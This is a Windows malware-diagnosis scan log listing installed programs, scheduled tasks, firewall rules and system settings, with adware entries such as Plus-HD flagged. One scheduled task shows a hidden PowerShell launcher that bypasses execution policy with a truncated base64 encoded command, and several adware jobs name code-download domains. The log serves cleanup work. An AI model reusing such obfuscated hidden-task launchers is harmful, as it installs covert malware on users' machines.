ArcSoft Camera Suite (HKLM-x32\...\{A117C1DE-00F1-4634-A9A9-6E6FC70FBD4B}) (Version: 1.0.26.55 - ArcSoft) Hidden
ArcSoft Camera Suite (HKLM-x32\...\ArcSoft Camera Suite) (Version: 2.0.30.55 - ArcSoft)
ATI Catalyst Install Manager (HKLM\...\{E686FBB0-B356-96BE-A9ED-2D8286AA0386}) (Version: 3.0.829.0 - ATI Technologies, Inc.)
Bejeweled 3 (HKLM-x32\...\WTA-d33cd767-b556-40f2-a238-f02d68978ccf) (Version: 2.2.0.97 - WildTangent) Hidden
Bing Bar (HKLM-x32\...\{9FA13759-5C2B-4177-9DDC-0038F8B5BEFD}) (Version: 7.0.826.0 - Microsoft Corporation)
Blasterball 3 (HKLM-x32\...\WTA-6772263a-2b98-4066-a486-20d31078eeab) (Version: 2.2.0.97 - WildTangent) Hidden
Bounce Symphony (HKLM-x32\...\WTA-524e3c3c-a2c1-450c-b32c-9e98764606af) (Version: 2.2.0.97 - WildTangent) Hidden
Cake Mania (HKLM-x32\...\WTA-9c7f4afd-8fe9-4070-90e6-b799d43ac33c) (Version: 2.2.0.95 - WildTangent) Hidden
Chronicles of Albian (HKLM-x32\...\WTA-17b1000c-6ca2-4ca1-b7f5-65bfcdcd33f6) (Version: 2.2.0.95 - WildTangent) Hidden
Chuzzle Deluxe (HKLM-x32\...\WTA-06194e50-4e76-4538-8d54-edc77c478c42) (Version: 2.2.0.95 - WildTangent) Hidden
Cradle of Rome 2 (HKLM-x32\...\WTA-a22b7974-4a50-4b46-aa3f-f58481588045) (Version: 2.2.0.95 - WildTangent) Hidden
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DMUninstaller (HKLM-x32\...\DMUninstaller) (Version:  - ) <==== ATTENTION
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
Evernote v. 4.2.3 (HKLM-x32\...\{F761359C-9CED-45AE-9A51-9D6605CD55C4}) (Version: 4.2.3.22 - Evernote Corp.)
Farm Frenzy (HKLM-x32\...\WTA-55d3dd79-09f3-4488-9339-11d2f1eb9493) (Version: 2.2.0.95 - WildTangent) Hidden
FATE (HKLM-x32\...\WTA-45bfd237-b808-4567-a7c2-893735e60c95) (Version: 2.2.0.97 - WildTangent) Hidden
Galería fotográfica de Windows Live (HKLM-x32\...\{E85A4EFC-82F2-4CEE-8A8E-62FDAD353A66}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galeria fotogràfica del Windows Live (HKLM-x32\...\{4736B0ED-F6A1-48EC-A1B7-C053027648F1}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (HKLM-x32\...\{488F0347-C4A7-4374-91A7-30818BEDA710}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Google Chrome (HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Google Chrome) (Version: 31.0.1650.63 - Google Inc.)
Governor of Poker 2 Premium Edition (HKLM-x32\...\WTA-7ec050fb-85bf-473f-afe5-7b8ce16c4e83) (Version: 2.2.0.95 - WildTangent) Hidden
HP 3D DriveGuard (HKLM\...\{5601F151-A69F-4E30-8C60-37928124CD07}) (Version: 4.1.9.1 - Hewlett-Packard Company)
HP Documentation (HKLM-x32\...\{9F0019B0-8C1A-4B1E-8381-E9D9B41079DE}) (Version: 1.1.0.0 - Hewlett-Packard)
HP ESU for Microsoft Windows 7 (HKLM-x32\...\{A6365256-0FBA-4DCD-88CE-D92A4DC9328E}) (Version: 2.0.1.1 - Hewlett-Packard Company)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP Mobile Broadband Drivers (HKLM-x32\...\{646E8C34-C88B-42F9-9F41-985A801219E1}) (Version: 7.0.0.4 - Ericsson AB)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{285F722C-0E45-47DE-B38E-5B3B10FA4A7C}) (Version: 2.5.2 - Hewlett-Packard Company)
HP QuickWeb (HKLM-x32\...\{D6159AEF-32BD-4177-82AE-5ED1F0F0DC1D}) (Version: 3.1.1.10066 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{03046EBB-CB7C-4B98-BEFB-690EB955DA22}) (Version: 8.5.4526.3645 - Hewlett-Packard Company)
HP SoftPaq Download Manager (HKLM-x32\...\{344A1AA2-AC8E-4741-BDB0-65B68FDA883C}) (Version: 3.2.0.0 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{AF240B18-034B-4A82-B3FC-0B879C4BAE2E}) (Version: 4.5.1.1 - Hewlett-Packard Company)
HP Software Setup (HKLM-x32\...\{531000B3-DBEE-4115-BBF3-DA48B67C053F}) (Version: 8.2.1.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}) (Version: 7.0.39.15 - Hewlett-Packard Company)
HP System Default Settings (HKLM-x32\...\{D2A2E5CD-801A-4B8D-8119-F79449A09B67}) (Version: 2.3.1.2 - Hewlett-Packard Company)
HP Wallpaper (HKLM-x32\...\{11C9A461-DD9D-4C71-85A4-6DCE7F99CC44}) (Version: 2.01 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6351.0 - IDT)
Intel® PROSet/Wireless for Bluetooth® 3.0 + High Speed (HKLM\...\{FE3DEA5D-60D7-4C92-A71F-1E1F2F4615FC}) (Version: 14.2.0.0216 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{2ABA2E8D-23CF-418F-BC8F-2EC99FA51A3F}) (Version: 1.2.1.0608 - Intel Corporation)
Java™ 7 Update 4 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217004FF}) (Version: 7.0.40 - Oracle)
JavaFX 2.1.0 (HKLM-x32\...\{1111706F-666A-4037-7777-210328764D10}) (Version: 2.1.0 - Oracle Corporation)
Jewel Quest Solitaire (HKLM-x32\...\WTA-90b790ae-60c1-4b8e-9d1a-221a6b5af398) (Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest: The Sleepless Star - Collector's Edition (HKLM-x32\...\WTA-2293f013-c5bc-4dbb-b7df-1cadd5626988) (Version: 2.2.0.95 - WildTangent) Hidden
Juniper Networks Secure Application Manager (HKLM-x32\...\Neoteris_Secure_Application_Manager) (Version: 6.5.0.15551 - Juniper Networks)
Juniper Networks Setup Client (HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Juniper_Setup_Client) (Version: 2.1.3.6931 - Juniper Networks)
llEsss2pay (HKLM-x32\...\{82B558C7-2A69-D3D5-B65A-DCAB3B65AD02}) (Version:  - less2pay) <==== ATTENTION
Mah Jong Medley (HKLM-x32\...\WTA-cf9503ab-b1a9-492b-8a77-53a30506c510) (Version: 2.2.0.95 - WildTangent) Hidden
Malwarebytes Anti-Malware version 1.61.0.1400 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.61.0.1400 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.5131.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.5.216.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft_VC90_CRT_x86 (HKLM-x32\...\{DF2035BE-5820-4965-BD97-7FAF8D4A7879}) (Version: 1.0.0 - Microsoft Corporation)
Mystery of Mortlake Mansion (HKLM-x32\...\WTA-20aa863f-fcff-417d-99e6-9144fd29dc7d) (Version: 2.2.0.97 - WildTangent) Hidden
Namco All-Stars: PAC-MAN (HKLM-x32\...\WTA-3213b3b7-4248-4bd8-8ac2-d3279716afa1) (Version: 2.2.0.95 - WildTangent) Hidden
PDF Complete Special Edition (HKLM-x32\...\PDF Complete) (Version: 4.0.64 - PDF Complete, Inc)
Penguins! (HKLM-x32\...\WTA-9def8145-5f3d-466d-8131-7f193b558514) (Version: 2.2.0.95 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (HKLM-x32\...\WTA-0e88edde-8fc4-4d0b-a821-44cd02ef058f) (Version: 2.2.0.95 - WildTangent) Hidden
Plus-HD-1.2 (HKLM-x32\...\Plus-HD-1.2) (Version: 1.32.153.0 - Plus HD) <==== ATTENTION
Polar Bowler (HKLM-x32\...\WTA-31d05db2-11b5-49d4-a9f0-934b3ce8def3) (Version: 2.2.0.97 - WildTangent) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.46.610.2011 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30127 - Realtek Semiconductor Corp.)
Slingo Deluxe (HKLM-x32\...\WTA-eb571057-e94a-4a0f-a40a-7d6027eb556a) (Version: 2.2.0.95 - WildTangent) Hidden
Software Version Updater (HKLM-x32\...\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}) (Version: 112.47.14.333 - ) <==== ATTENTION
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics TouchPad Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
Vacation Quest - The Hawaiian Islands (HKLM-x32\...\WTA-ea42100f-4180-41d0-a91a-083e512f4f5c) (Version: 2.2.0.97 - WildTangent) Hidden
Virtual Villagers - The Secret City (HKLM-x32\...\WTA-22a3da39-09f8-46a4-b959-0b6c15cbc2aa) (Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games App (HP Games) (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-hp) (Version: 4.0.5.2 - WildTangent) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
WinZip 15.0 (HKLM-x32\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240C1}) (Version: 15.0.9411 - WinZip Computing, S.L. )
WorkAssure - I & R for Windows 05.12.00 (HKLM-x32\...\{C65B4B79-7B57-4B05-99DF-528D27969684}) (Version: 05.12.00 - ARRIS)
Xobni Core (HKLM-x32\...\{8DC069E7-893C-41E1-9442-DE89FEC33371}) (Version: 1.0.0 - Xobni, Inc.) Hidden
Zuma Deluxe (HKLM-x32\...\WTA-3bc94b27-aef2-4ff6-9856-a013eff37fb8) (Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-893956484-597186715-3571521862-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tech 14\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-893956484-597186715-3571521862-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Tech 14\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll (Google Inc.)
ContextMenuHandlers1: [BTMSentToExt] -> {0A7D34C2-E9DA-48A1-9E34-0CDFC2DE3B44} => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [2011-10-18] (Intel Corporation)
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2014-03-11] (Microsoft Corporation)
ContextMenuHandlers1: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files (x86)\WinZip\wzshls64.dll [2011-03-02] (WinZip Computing, S.L.)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2014-03-11] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll [2012-04-04] (Malwarebytes Corporation)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2014-03-11] (Microsoft Corporation)
ContextMenuHandlers4: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files (x86)\WinZip\wzshls64.dll [2011-03-02] (WinZip Computing, S.L.)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2011-06-29] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll [2012-04-04] (Malwarebytes Corporation)
ContextMenuHandlers6: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files (x86)\WinZip\wzshls64.dll [2011-03-02] (WinZip Computing, S.L.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1A2237E1-06B9-473A-AA9F-0B71FBFE15B2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {377FBCA9-E775-4F65-9277-ED0882D40ED0} - System32\Tasks\Plus-HD-1.2-updater => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exe [2013-12-22] (Plus HD)
Task: {63F10999-1085-44F5-92F4-00E3050A14A6} - System32\Tasks\Plus-HD-1.2-chromeinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe [2013-12-22] (Plus HD)
Task: {6A0BBF0A-DE94-41FE-9157-FF8D9970AB11} - System32\Tasks\Plus-HD-1.2-firefoxinstaller => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exe [2013-12-22] (Plus HD)
Task: {78A71E6E-B9EF-42C2-8A33-579D8F25CE03} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {83FFF528-C1BA-44DF-9067-A5A730D76391} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe
Task: {AA72BE28-D781-4FCA-A97F-27CAA5C4187D} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {BAE3B976-BA97-4A8A-9EC4-2A9569AA4CAE} - System32\Tasks\Plus-HD-1.2-codedownloader => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exe [2013-12-22] (Plus HD)
Task: {C0AA07A6-9F7A-43C2-85BF-8063C3017983} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000UA => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe [2012-06-15] (Google Inc.)
Task: {DD61A677-5F85-4AEB-B8BD-5317EC47C0C5} - System32\Tasks\{82E158D8-861E-4010-A444-A4549883AF54} => C:\windows\system32\pcalua.exe -a "C:\Users\Tech 14\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8VWGHUL4\PokerStarsInstallPM (2).exe" -d "C:\Users\Tech 14\Desktop"
Task: {E7F157B8-18FC-44F8-9362-7CF6F27B0696} - System32\Tasks\Plus-HD-1.2-enabler => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exe [2013-12-22] (Plus HD)
Task: {F1CF095C-067C-4E96-8457-6FABD1C8EDE0} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000Core => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe [2012-06-15] (Google Inc.)
Task: {FA3683F2-5F9B-47D0-889A-09D8BFDDF1BE} - System32\Tasks\{B68E879D-FE0E-7106-2643-B9053FB27FCC} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAA7ADsAOwA7ACAAOwA7ADsAOwAgACAAOwA7ACAAIAAgADsAOwAgACAAOwAgADsAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIA (the data entry has 8028 more characters).
Task: {FA9233DD-423A-457F-BD31-003D43E5F021} - System32\Tasks\AmiUpdXp => C:\Users\Tech 14\AppData\Local\29033\Updater.exe [2016-07-17] (Emirates) <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\windows\Tasks\AmiUpdXp.job => C:\Users\Tech 14\AppData\Local\29033\Updater.exe <==== ATTENTION
Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000Core.job => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000UA.job => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-chromeinstaller.exe/installcrx /crxinstalltype=0 /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.crx' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-codedownloader.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-codedownloader.exeǀ/reinstallapp /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /codedownloaddomain=hxxp:/app-static.crossrider.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-enabler.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-enabler.exeƕ/enablebho /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-firefoxinstaller.exeͳ/installxpi /agentregpath='Plus-HD-1.2' /extensionfilepath C:\Program Files (x86)\Plus-HD-1.2\31255.xpi' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installerfullversion=1.32.153.0 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /waitforbrowser=300 /extensionid=39e612de-2951-40c2-ab4a-82e121c42778@4e0cecc2-7c67-4374-bc4c-f15656d80ab7.com /extensionversion=0.93 /prefsbranch=a39e612de295140c2ab4a82e121c427784e0cecc27c674374bc4cf15656d80ab7com31255 /updateurl=hxxps:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/31255.rdf <==== ATTENTION
Task: C:\windows\Tasks\Plus-HD-1.2-updater.job => C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-updater.exeǸ/runupdater /agentregpath='Plus-HD-1.2' /appid=31255 /srcid='000816' /subid='0' /zdata='0' /bic=B70521E47A40433B921CF13F51B27A4AIE /verifier=d1595ef0dc30440c3af7374ae56f055b /installerversion=1_32_153 /installationtime=1387757473 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hxxp:/update.srvstatsdata.com /updaterversion=2 /monetizationdomain=hxxp:/stats.syncstatsdata.com <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\500px.lnk -> C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=egpociadnldbkfkjpmjoaibnbcoeplja
ShortcutWithArgument: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Any.do.lnk -> C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ocgddccilgpeepgglnlpchkpgamkgmld
ShortcutWithArgument: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\WeatherBug.lnk -> C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=njkkjobcechefaoknodniidfjapgfoco
ShortcutWithArgument: C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Wunderlist for Chrome.lnk -> C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ojcflmmmcfpacggndoaaflkmcoblhnbh

==================== Loaded Modules (Whitelisted) ==============

2011-06-29 02:38 - 2011-06-29 02:38 - 000243712 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2011-06-17 16:42 - 2011-06-17 16:42 - 000016384 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2012-04-06 04:50 - 2011-07-13 14:10 - 000065576 ____R () C:\Program Files (x86)\Ericsson\Mobile Broadband Drivers\WMCore\MBMDebug.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720 [126]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2009-06-10 17:00 - 000000824 _____ C:\windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-893956484-597186715-3571521862-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 199.203.131.151 - 82.163.143.181
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{84268F2A-B813-4F26-8863-5947EEF44252}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{79710AA8-74BB-437C-8546-897B52453C10}] => (Allow) LPort=2869
FirewallRules: [{F4C48E78-2D7C-452B-A575-20B782D7B05D}] => (Allow) LPort=1900
FirewallRules: [{A0FAE66D-E64C-4BDD-95A5-5B6F9F472D96}] => (Allow) C:\Users\Tech 14\AppData\Local\Temp\7zS4490.tmp\SymNRT.exe
FirewallRules: [{336AE294-5A9B-42ED-8C17-7D28ABE1F2EE}] => (Allow) C:\Users\Tech 14\AppData\Local\Temp\7zS4490.tmp\SymNRT.exe
FirewallRules: [TCP Query User{1A7AF002-4713-4AC3-9AFF-3DAD876B8A16}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [UDP Query User{5972DF2D-415C-4DDB-AFE8-71F8557913F5}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{4A223AA7-6BFE-41D4-8115-498D3669643B}] => (Allow) LPort=443
FirewallRules: [{5B2CF182-BECC-4489-B189-B8AB940F4C2B}] => (Allow) LPort=443
FirewallRules: [{D34EF551-70D6-4F0D-95DB-8D59F4E67225}] => (Allow) LPort=37674
FirewallRules: [{43DA3EE4-36B5-4B8A-AC1D-5E7BF39752BE}] => (Allow) LPort=37674
FirewallRules: [{130D0186-8EF5-4DE7-B327-E79B83A602CB}] => (Allow) LPort=37675

==================== Restore Points =========================

22-04-2014 20:39:06 Windows Update
22-04-2014 21:47:24 Windows Update
25-04-2014 16:54:28 Windows Update
18-07-2016 19:25:45 Windows Update
18-07-2016 21:42:14 Windows Update
21-03-2018 12:22:00 Removed ooVoo
21-03-2018 13:09:09 Removed Skype™ 6.11

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/21/2018 11:03:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/21/2018 10:57:33 PM) (Source: WinMgmt) (EventID: 10) (User: )
